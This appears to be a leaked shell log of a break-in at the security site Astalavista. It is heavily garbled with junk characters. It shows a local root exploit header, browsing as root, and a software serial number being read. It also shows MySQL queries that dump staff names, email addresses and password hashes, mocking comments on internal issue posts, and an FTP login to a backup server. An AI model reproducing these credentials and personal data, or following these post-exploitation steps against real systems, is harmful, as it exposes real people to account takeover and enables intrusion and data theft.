' P, A$ }% I0 R( e- R( _5 J: ^drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
7 K& m! j, G1 udrwx—— 2 com com 4096 Jun 4 04:04 backups* H% ]: t1 h# a. V0 }9 n* `* h
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
* e+ J9 F7 G, X7 Ldrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
* X) g; |1 R* |1 v( ?) `& p# e0 \-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
' B b4 f' w0 Z e) P-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout2 U; c% q' S& P$ i3 u' a
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile, q' v6 l' `/ D% d% y9 L8 H
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
8 {8 n$ q% U; zdrwx–x–x 3 com com 4096 Jan 29 2008 domains
0 X& O5 k0 z) P3 ~$ k% L/ \-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed3 D$ @$ d+ }* z9 w
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap5 P3 u! G- G% r9 ^* {( [
-rw——- 1 com com 69 Nov 18 2008 .lesshst
6 z, |( Y. X" l) X) Jdrwx—— 2 com com 4096 Sep 24 2007 mail( T" n; I; n3 g
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
) X# {. e6 r$ ]% ^' q, i9 ?1 M0 z% ~drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp" v+ ?3 b; G5 s |+ e3 j
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html$ d m5 u; |# E& f0 y+ q; \* w9 D
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: Q$ L0 G8 H0 T1 t8 \drwx—— 2 com com 4096 Aug 26 2008 .ssh
$ {0 z M" L Q-rwx—— 1 com com 8515 Feb 10 2008 t
. n5 u& {% L! J! ?, O8 O- O8 K5 g-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c8 b- l& W8 e, T/ R7 u8 t6 n2 R8 ] o
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
t1 q4 N& Z- K( t' C: q-rw-rw-r– 1 com com 617 May 20 2008 .toprc2 i$ ~% [2 J3 j; J7 W8 v! [
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql5 B5 R J5 h* f5 Z
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo, O$ w% G9 U) E
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
9 n' H" }; r8 Z9 ^ o
/ M) m8 w8 Q* ~- |4 N! m+ n' M5 Esh-3.2# head t.c+ q* T. y( y2 b* |. }
/*& I2 O0 @. H7 k. C
* jessica_biel_naked_in_my_bed.c
4 _9 M/ C6 j9 O' c& w. u*
" q$ G; e9 C( {6 ?* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
( q0 S- \7 P7 z0 E# L1 t* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca., m) H# J$ E8 X6 E; q( c
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
/ n% R% p& ^) y" Z" q) v' x: \9 P*
# F2 \0 o$ j }5 [1 k! w* Linux vmsplice Local Root Exploit: q( W! {; ~$ s- a9 C- `
* By qaaz
+ }7 G, ~& _7 c$ s0 l7 b* t*$ y. A8 Q2 I+ ~- l7 l
- f( C3 [: C2 n8 R# D$ H
sh-3.2# cd /3 d9 u5 n5 ?1 C- e$ q" _
sh-3.2# ls -la1 B. [/ D4 R6 V1 e4 L! [
total 360
: j. x k, P% r) y Ndrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
5 M! r$ P* B% s, \; g4 t5 e @" Xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: }1 Y$ U/ G" E B+ Z+ [; u-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
& q: y% `+ W1 C, V8 |-rw——- 1 root root 10240 Jun 3 02:39 aquota.user& M1 l$ j, y5 b
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db2 y9 t' {# D3 j% Z
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck5 J2 k) c% i2 h8 t
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel. I( i) o1 |' _- B9 ^" c: s4 M
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup+ @0 o' v5 |+ z
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin: d, M& q6 ~( @+ y2 W" F
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
3 P/ |; d- M3 C/ b! udrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev% Q6 V6 g: t: x
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
! o" J$ F1 c) {9 @' Idrwxr-xr-x 14 root root 4096 Mar 11 17:56 home) |% w( b3 l4 F- R9 G# W
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
, Q- e5 Q' h8 I* a# o, l+ Ndrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib1 i+ B9 B) W. J6 [ \$ X
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
) m+ b' m3 P, n0 r$ O4 r- Cdrwx—— 2 root root 16384 Sep 11 2007 lost+found- H( Y( ]9 b* J# F
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
+ R# D) m5 @2 e+ g1 Qdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
& U5 X6 [7 |: S9 N- |3 bdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
4 C$ c" ?* w% x* b; u" }! Q2 I-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg/ K8 ]! l! ~0 k2 }5 e y
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
. _. f5 S1 H# ~) G+ p* Qdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
# ?4 X6 s* X! W8 {dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc5 G1 t8 |+ n/ l, ~. q! |8 r
drwxr-x— 15 root root 4096 Jun 4 08:40 root1 H8 ~1 S- S& J
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin- |0 p9 k; A% }( I3 F* y: D* B
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
0 j9 ~4 v( Q. D" L% l4 \0 cdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv# E" x+ W. l& S' c& {
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
; F# U/ F: X0 f: bdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
" f2 x5 ^4 M: P" a2 \3 fdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
8 R5 X1 K1 X7 {! vdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 t L+ { C" @; E# _2 t! w' X @3 F' l# H4 s" ?; e$ l* l p/ h
sh-3.2# cd opt0 N6 R6 H' }) i( }6 H8 x# e1 G6 T
sh-3.2# ls -la
. S3 ^6 ?9 x( Y% K8 _5 l0 Ftotal 20. Y( h4 X& U2 R) u {0 H
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ., I) ~2 X6 \* C/ S7 r
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: M3 }9 Y+ r8 m3 q0 c/ B) v* sdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
3 J' _$ I0 m: T3 u
; q' e4 K& k! K5 _sh-3.2# cd lsws/
2 }6 s! M: D) \4 f5 fsh-3.2# ls -la! B4 |! w& g) w7 I. V8 }$ g- C8 [
total 108
$ J) _, l, r( Q8 a( ndrwxr-xr-x 15 root root 4096 Mar 20 2008 .
; \+ r2 d5 { k6 _( l9 Y1 E6 @' Hdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..7 c! S9 q/ r3 I" R* N4 M
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons4 v& D7 u e7 q& C
drwxr-xr-x 13 root root 4096 May 29 15:10 admin( z" z5 t+ }' l, \$ x+ u
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
4 g+ {( H" t, E) \( d, C8 Ndrwxr-xr-x 2 root root 4096 May 29 15:10 bin! `, y$ c" [9 k
drwx—— 4 apache apache 4096 Jun 3 02:43 conf
& X# o. l8 ~" Adrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
' s9 S' ]) ?5 Z7 K. J7 R" L; Bdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs- _5 @, q5 V. C9 }: b
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin4 b# X/ x" B$ M; ~
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
' K& d; Z5 E1 v* x' a! a; o/ Q-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE2 l8 W' M; Q( l5 n) M
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
' X; ~0 o. l1 H, a/ r-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
3 m& F/ L4 C- m9 O4 x6 X/ u-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP. g7 { \- t5 z9 E" Z" W
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
" Y v( M! x3 L0 cdrwxr-xr-x 2 root root 4096 Mar 20 2008 php
5 @6 I( r- x5 [ idrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild: X: L7 G" _; x( g5 { j
drwxr-xr-x 3 root root 4096 Mar 20 2008 share0 k. I% X4 W2 J4 P4 r2 `
-rw-r–r– 1 root root 6 May 29 15:10 VERSION5 w8 G9 b! y0 z2 N( j* y) u
* h: U: D" u7 s4 Y. u K1 xsh-3.2# cd conf
! k* B3 e) L# ~9 W5 s" `# tsh-3.2# ls -la: }: [' g: ~( B( G) O: L
total 48( m, c6 f6 p8 N" Y, Q
drwx—— 4 apache apache 4096 Jun 3 02:43 .
1 U, ~, f! Q8 M( ^# d: B0 Qdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..2 @, V& _, a+ C D0 E+ J4 ]' _
drwx—— 2 apache apache 4096 Mar 20 2008 cert# B- C& R: e+ `" X; _; {; ?6 P
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml3 f7 ~, i2 i; q8 n( i
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* ?9 \2 K/ c, j R; J-rw-r–r– 1 root apache 0 Jun 3 14:11 .last9 o/ w7 O) a! a
-rw——- 1 apache apache 256 May 29 15:10 license.key( K. L! V& I, m8 p1 K0 M; l
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
( w I8 P$ g; w; o2 r) ~# m( e-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties, s7 v; O K( C" x3 F" ]/ k
-rw——- 1 apache apache 20 May 29 15:10 serial.no. x1 Z. G. _6 B! v! E' B! i6 M
drwx—— 2 apache apache 4096 Mar 20 2008 templates* U0 k0 {% o/ H/ W$ _+ P
: c- B1 J( f3 j `sh-3.2# cat serial.no/ b9 H6 [; Q+ f9 D5 F8 R
IbDl-oVsO-CKqL-wVRa
5 W0 ]8 R9 X6 c; m
$ R/ d. B/ T; D* csh-3.2# mysql9 N' ]0 Q& o$ F! h
Welcome to the MySQL monitor. Commands end with ; or \g.
. Q$ C4 ]7 l9 P: Q# Q/ O0 MYour MySQL connection id is 286844
2 t) j" e& X7 J( h% B+ p+ QServer version: 5.0.45-community-log MySQL Community Edition (GPL)# R0 @+ o- _6 S3 E/ e! N2 J- e$ b
9 d, g9 `( C4 h! \/ V- sType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! c o+ b- V6 f5 i' _6 p1 K2 [. r7 l' q1 ~
mysql> show databases;
- U3 s% {8 ?6 |0 x) Z! L3 S! ?- n+———————–+9 W0 t4 T) L8 S
| Database |5 W2 @' A9 A; h% W& N
+———————–+2 e) {) F/ f7 P- d# ~+ R
| information_schema |
3 e( Y! Q0 n, S j; F| astanet_ads |
% g, Y" a# X: y* h1 Y/ z% ]6 y+ h| astanet_mailing_lists |& M1 f$ L) |* r2 s7 Y* h
| astanet_mediawiki |
6 U, J; G2 {$ b/ _| astanet_membersystem |
8 f. [3 {( X( O. w. u2 \| com_contrexx |- Q: [4 o9 O+ `. a: _
| com_contrexx2 |- k( B/ Z8 t& M, i5 T( a
| com_contrexx2_live |
% x/ a+ V/ [0 M8 z- h3 X| da_roundcube |, u6 J8 I3 P( [5 l$ _& K
| dolphin |8 l/ J" a- R2 k$ i: m5 ~% ~
| ideapool |4 R8 ~% F, z& P5 \. n2 b
| mysql |" M; {3 |3 w( X6 t! ?' e! s
| test | }( P- S5 {; q: T7 a$ v/ \
| yourmaster |* y7 A' _ N" f O% g! i& E: C- `3 ]. y
+———————–+) l, W8 d5 t- F: f8 Z
14 rows in set (0.00 sec)7 v/ p4 ~' n6 e) W. h
3 Z6 f* i- O# \mysql> use ideapool* o: C7 X* f" c* }( Z
Database changed- c; f. t; C! q+ E& L
mysql> show tables;2 M" Z8 m) e; h2 i- |
+———————————–+/ `$ B: i6 r: Z9 J' J
| Tables_in_ideapool |) n; E y" g1 C7 x
+———————————–+
" P8 t* r- N& ]. t6 R& J5 g+ i| eventum_columns_to_display |; w* k% f% ?3 C- C0 M* W0 x
| eventum_custom_field |
9 |2 q4 _+ y+ `! H. L2 w3 I| eventum_custom_field_option |
+ O" i4 J: q4 [/ M. k3 { N9 h' E| eventum_custom_filter |
$ m& v, J0 u, W| eventum_customer_account_manager |
! ^9 z' G. {7 z| eventum_customer_note |
5 F5 A% Q* m# K: ?9 g7 x' z| eventum_email_account |; P" W& d9 |- F3 {
| eventum_email_draft |
9 K7 P6 K0 V# V# ]| eventum_email_draft_recipient |6 m. O2 `& d- B* a" I
| eventum_email_response |
; y* I; f Y% a$ R| eventum_faq |. Q R( P4 ^6 W% H( s/ _1 Z) R
| eventum_faq_support_level |
" ?! y$ v) K- d| eventum_group |
/ i: I0 V9 H2 m7 C| eventum_history_type |
7 i3 C) N7 c4 t' k2 P( a8 i| eventum_irc_notice |
% w+ ` a0 c5 w% U' Q; m| eventum_issue |" @4 m' p, W: S& P7 q
| eventum_issue_association |
( N- a; `) u8 P7 n| eventum_issue_attachment |
" y/ w" G b. h R, n| eventum_issue_attachment_file |
e1 x' F( g5 L8 v j y| eventum_issue_checkin |
# q- i$ n1 D4 K) S* y: C! h$ s7 || eventum_issue_custom_field |
' T0 K( ~5 N/ j" R3 ]- N+ x4 p/ r| eventum_issue_history |
# p# h1 Y. J8 C( ^| eventum_issue_quarantine |2 Q9 G- ?9 o6 w y/ X
| eventum_issue_requirement |, A( A; h' m5 S ]5 s& A$ M' p4 X# ?- A
| eventum_issue_user |
7 I3 p' Z f% v) V, N, ^" v9 n| eventum_issue_user_replier |" U/ N( M1 l* z( i9 P6 `
| eventum_link_filter |, a1 |9 X, N/ E8 S @, M, @
| eventum_mail_queue |0 {- E4 h# C# n9 c$ ^7 `
| eventum_mail_queue_log |
4 u4 S3 a# m7 u6 c# t" N| eventum_news |
8 L6 f( R4 y4 k; H| eventum_note |* I# u& n& P/ Z* i
| eventum_phone_support |
/ {. }+ p- H! [- I| eventum_project |) U; w% {* q0 F1 }, @
| eventum_project_category |
# D' M8 G; O9 T' u8 s" Q/ u| eventum_project_custom_field |
. o/ k$ [# ^) P: D| eventum_project_email_response |$ v- N6 I2 A5 v/ Y$ C' _
| eventum_project_field_display |8 }+ P# V4 a& K1 ?
| eventum_project_group |
3 V6 \. L& p6 v1 {* k| eventum_project_link_filter |/ `& a' E5 U3 f0 P" y1 }
| eventum_project_news |, g! t7 ^. b" _; @8 W' {4 f
| eventum_project_phone_category |
3 I8 p# H4 m# {" G! O0 F2 j| eventum_project_priority |
6 y5 R5 Z4 ]/ o' j7 O/ `/ H| eventum_project_release |
+ j' x; c9 e% l( h| eventum_project_round_robin |) x0 s% z2 R: K
| eventum_project_status |
; W- f6 i: A/ B0 V: A, J| eventum_project_status_date |
& _4 E3 p! O* P( j5 p$ P) l8 X| eventum_project_user |6 k- w0 G5 L$ n1 U8 B
| eventum_reminder_action |% ^4 \% Y7 L, t5 c0 Y/ L/ _
| eventum_reminder_action_list |1 H+ }6 M( G' N! D# N- \
| eventum_reminder_action_type |4 L, C, t. A5 @4 W8 d$ e0 A6 k
| eventum_reminder_field |; n4 G# Z* d) M; @) L
| eventum_reminder_history |. x. V' W" h" ]0 m) `, H5 Y( }2 v' q
| eventum_reminder_level |/ \. p. n: ?% N* g$ \1 i$ Y
| eventum_reminder_level_condition |
+ w0 ^" D" B+ P8 h4 B* T D| eventum_reminder_operator |/ d5 \) W: Z1 v- L% J7 y! K
| eventum_reminder_priority |: d) N" F$ O" h. B8 c
| eventum_reminder_requirement |0 g1 `' Z! ]+ U% P6 E# ^0 U- o& u
| eventum_reminder_triggered_action |$ x) f9 O0 x( w! p0 q3 V
| eventum_resolution |
. r8 S+ a0 t2 X- r5 n1 Q| eventum_round_robin_user |
" F) z6 {# Z# @. p! F9 |0 ?| eventum_search_profile |
7 }. g6 ?5 A. V. H5 Z! s| eventum_status |% ~) h* E- N) V7 |& X8 v: F% G) y
| eventum_subscription |
6 Y; _# e6 m: M0 `3 S| eventum_subscription_type |
* W2 e+ ?& E$ L6 || eventum_support_email |
3 _5 {* n$ t, H7 V I0 k| eventum_support_email_body |
4 b+ y$ L+ ^/ m6 N& C) B/ t8 W| eventum_time_tracking |
/ |! h( u% C0 Z9 y/ u' I! j7 k| eventum_time_tracking_category |
% w/ h8 ^0 K9 W- y| eventum_user |
3 w5 q- W( Q& d) c3 k+———————————–+* i# E: m$ k. X U a
69 rows in set (0.00 sec)9 c& i/ b; j& \- d
$ t7 U; w/ r! R% c8 l% Umysql> describe eventum_user;% f: {2 A3 H6 S# H
+————————-+——————+——+—–+———————+—————-+
* v; c- l- O H9 v| Field | Type | Null | Key | Default | Extra |
# Q. |2 @+ f B$ t" ]# H5 a% Y: w: F+————————-+——————+——+—–+———————+—————-+
9 i4 e3 i8 M% w% p1 A4 N0 g; g* N| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
. T) u8 S' X& X, y| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
. Z& c9 U5 ~3 V7 L2 ]3 x1 @| usr_customer_id | int(11) unsigned | YES | | NULL | |1 j4 K: O7 x& ~
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |2 Q: V' V9 @# `
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |" X: w1 L: {$ k& Q- r
| usr_status | varchar(8) | NO | | active | |
/ L h K# S( }- W0 T. h. i3 k| usr_password | varchar(32) | NO | | | |8 d/ r$ m% Q- T
| usr_full_name | varchar(255) | NO | | | |3 I! K6 x/ |% q/ q/ Y/ D
| usr_email | varchar(255) | NO | UNI | | |0 T& a: R6 d$ d: [8 s
| usr_preferences | longtext | YES | | NULL | |- ~; u* y/ h% }1 w* d, m
| usr_sms_email | varchar(255) | YES | | NULL | |9 g8 f# N! H; n0 I* f8 C4 _
| usr_clocked_in | tinyint(1) | YES | | 0 | |: K( U$ T0 ^; @ l3 {# o
| usr_lang | varchar(5) | YES | | NULL | |
! R. I5 f# C3 c* l+————————-+——————+——+—–+———————+—————-+
5 C5 w+ }9 R* L5 Y$ d; v5 B: K13 rows in set (0.00 sec)* \6 U0 R p$ t" t- s8 M5 [0 z
0 L p, J( y# h! F% |
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
1 E1 b$ W0 \# ~+———————-+——————————-+———————————-+* C0 b4 g$ w) A& t% f
| usr_full_name | usr_email | usr_password |
7 m& W7 [7 W- J& R9 E+———————-+——————————-+———————————-+
; F. K9 S* F& k7 t- v! p5 m; T| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
* O) A" y# ^( i8 ?: n8 q| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |! e. @- E# A' e" [
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
, t; |- B9 P; {3 a5 s| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |) u" T/ ?" I0 I3 }1 M/ e& N
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |4 c; e G0 ~; M9 X" ^- ?% P
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |- P m, y' x6 E7 H7 j' r0 l
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
0 I0 E; w; ]) G( q2 m$ K4 j| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
$ k h2 \9 h! k0 T$ r+ ]* x7 M| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |1 y7 C" y( h( G
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
. P( z$ r+ W4 J& l+ {7 N| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
2 ?3 ` W# t3 v2 W3 D% \| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |" j7 V2 o; U, ?, C8 E* L6 Y+ z l
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |. v* N& S A. i: |3 G3 R; e. R
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
@5 v/ H2 |7 l* J7 H1 g| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |( u- h ]3 |. o0 H, A% B1 Z
+———————-+——————————-+———————————-+
* p6 L: I4 P$ L! _15 rows in set (0.00 sec)
% B1 i& ~; g2 g- }- B3 K2 W* [
- A9 z; _& x. q. D1 o& Imysql> select iss_description from eventum_issue where iss_id = 43;
7 v8 K/ N9 }* d$ C1 O: `! _+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
c% U1 a! d v5 {$ T| iss_description 9 g, o# C5 W8 k' c B& t6 ?" k/ y z
|+ h) J/ g2 m S( r
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-++ ?# J, ?8 V4 [2 p5 ^/ r& ~
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be6 |! k) W8 ]2 E; F0 E
connected for 90 mins… 120mins… so what i propose is something like: `: T+ K a$ i4 N; {! K7 h
链接标记[url]http://www.surfthechannel.com/[/url]$ c- U" }) l) N6 j0 Q) Z
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system$ E+ I5 a3 ~% K8 A
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
! l7 J3 W6 m- y. rbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off, @! M+ w; |" v% T$ G8 u
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…0 q. }3 \' v R! C7 H: K4 u4 Q
# w1 \" b0 j) o# K! X" wWe could also put advertisement during play on the flash video player itself… extra $$…& |. T: `- a2 F- L
- I7 B+ [. N' D- {" t
By sykadul |) F- x) o9 d0 S n
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+ C4 P J3 x0 t! o, Q, |+ x
1 row in set (0.00 sec)
5 {' x h3 w" f6 P* k7 P
: |0 S/ q5 o+ J, G// Money and extra $$ is all they care about. remember that.# R) c6 Q6 `! n8 [2 h
4 N8 t, ?+ S- s6 M$ [; Pmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
4 ^( z8 ]4 g$ J+ x( A: j+————————+——————————————————————————————————————————————————————————————————————————————-+
# L3 M+ @: c6 Y" b| iss_summary | iss_description
! t" W: S/ C8 _- `) H0 y8 F3 a|* P% a3 h. H8 \, b6 P" ^
+————————+——————————————————————————————————————————————————————————————————————————————-+
- B4 \* V# ^% N6 b4 G% Y& @| Forum for REAL EXPERTS | Hello,
# E/ F& j3 ]& c/ x& A! }. X7 B
* `* J7 j. G5 c* D8 z% z) I+ n; O2 hIshtus and I,+ _0 L+ l d: [. g. U+ j0 J
/ x6 { e; n) S: `5 K5 ~! B4 i
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide2 h- O$ ?5 J" {# p, T8 L S) d
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
5 c y1 C2 a8 f
) e9 w0 `5 O. R! _7 SOne example a friend of mine from coresecurity.com!3 ~2 J' P% Y( r9 B+ Q7 w
0 H9 P y3 P5 L. s9 f* }
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.." v. v6 r# C1 @+ ?% t E9 U
$ E5 C4 I3 {. P7 X3 k9 @|
. r v/ W9 y$ X) d0 R, r1 o- }+————————+——————————————————————————————————————————————————————————————————————————————+
7 p. _+ e, X' Z1 row in set (0.00 sec)+ o. {6 U# i @+ ?& `5 y
# V" Z0 ]- O2 r7 f/ O8 i9 ~, F// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…0 v3 N7 v; A( y
4 H8 z7 @# q* Y# G/ \1 K3 l
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
+ {1 m7 a g2 c N+——————+———————————————————————————————+/ B V" ]( o7 y* J5 s7 @
| iss_summary | iss_description |
! ]. L) ~4 `" d& v1 h+——————+———————————————————————————————+% k6 {( _0 p) F, Q8 G' e
| Website guidance | Virtual Girl which guides you trought the website.
! r0 v1 z/ W: S* [
3 m( j9 L! N6 N. FWe need a girl with who you can ( talk )!!!" r% [6 i) q- m. G$ K0 A5 p) b
Also for the News!
1 Z4 l( G4 D" L6 d$ mSo my suggestion is a girl who read you the news loud if you like!
* L) V# p1 {/ E+ Jyou can choose between read yourselfe or she read it for you or both!% ~1 \2 H0 x' V& D
0 U/ i; Y# S8 G p8 o( S$ a, H/ TGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
4 v+ u( \/ U* W: [5 p/ m, G* @: W+ ~- A- j6 d. n& O
Have a look on the example girls!!- g! O. f% {$ O/ z; R& p8 ?' V
) M# ~* f) C+ }: N q; A链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]+ b% ^2 e' y/ u R% s7 r3 z" N6 {
+ E+ V6 R0 r, }4 }; L7 F+ A0 k& ]or that6 y, O; a- i9 x/ T
$ [) E5 G, W% x. @
链接标记[url]http://www.yellostrom.de/[/url]2 v4 _9 I: z! S% K) F+ j
) f* v7 e/ r* Q; t7 E2 X|
L* l, n' m9 W, V! M5 j) c3 X+——————+———————————————————————————————+* G, H8 c( n$ H0 P
1 row in set (0.00 sec)
: U: @: F( |$ t+ ]3 N2 Z! R% _8 j* x' v+ p0 \
// ha ha.
4 q& e1 V* E, Y8 f6 J7 ^( B, `2 @* a" _: U* f
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;# e6 f/ c) J [4 R* r w
+————————–+———————————————————————————————————–+
7 p2 P$ b, p/ E) ]( R0 Y| iss_summary | iss_description |0 L/ s1 L+ S1 x5 x) L
+————————–+———————————————————————————————————–+5 r( ]; c, [- w. W: C: _
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |* @/ w% D7 c# l- W- Q/ m3 Y) D. d' i
+————————–+———————————————————————————————————–+
' X- ^4 s* P) C2 Z& m+ B1 B1 row in set (0.00 sec)
5 i3 \+ V. O% g7 A) e; O Y
9 W7 Y9 v( I W* c( S. i( s. c, ]// LOL.
5 H$ A% d5 R1 k, ~; D7 L% K- ~2 |' T& J& i4 z8 @2 f1 N0 ]
mysql> exit
7 m% r# h- ]! v% ?8 x; WBye
4 W9 b1 z. ~" ?# G% p, o$ N' @9 L8 L: [* H+ D" W+ `
sh-3.2# ftp 212.254.194.163& A- `, a, i# }5 M3 C# z
Connected to 212.254.194.163.
) G1 X0 p, M( W, k& y. W' E+ Y- q220 BackupCOM_VW FTP server ready.% ^" y4 x1 d1 T3 M; a
504 AUTH: security mechanism ‘GSSAPI’ not supported.
- ?4 s$ t' \+ [ a6 P504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.+ |. P k' F" r3 E4 D
KERBEROS_V4 rejected as an authentication type# \3 U% j1 r- G( P2 K
Name (212.254.194.163:root): astalavista.com
% t7 P0 C4 L$ N: V2 C0 t( J331 Password required for astalavista.com.. v8 t$ C8 L! C
Password:
B1 I% B6 ?& m2 I( Q230 User astalavista.com logged in.
" J+ t# y( ?& N4 S! G# ~5 e2 |9 t8 eRemote system type is UNIX.1 ?( V0 H$ Z9 t7 J& M
Using binary mode to transfer files.
0 B: ~" z# ` R0 Eftp> ls -la* C; ?7 h( k! w# t; p0 k
227 Entering Passive Mode (212,254,194,163,2,188)
& i7 k) V4 @. B' g& Y& d150 Opening BINARY mode data connection for ‘file list’.9 J, O7 w, Y! K/ H% @
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com8 r, W% A& m( B8 T& Q
226 Transfer complete.
6 ?* N. a* G; t! fftp> cd astalavista.com
; v A+ I" l7 E5 e4 ^5 p) B4 b250 CWD command successful.
# o. k/ D& D5 R8 C! Qftp> ls -la3 H+ D0 Z- E+ {' l- i- z
227 Entering Passive Mode (212,254,194,163,2,189)) \0 m7 ~# n6 Q# W0 T
150 Opening BINARY mode data connection for ‘file list’.
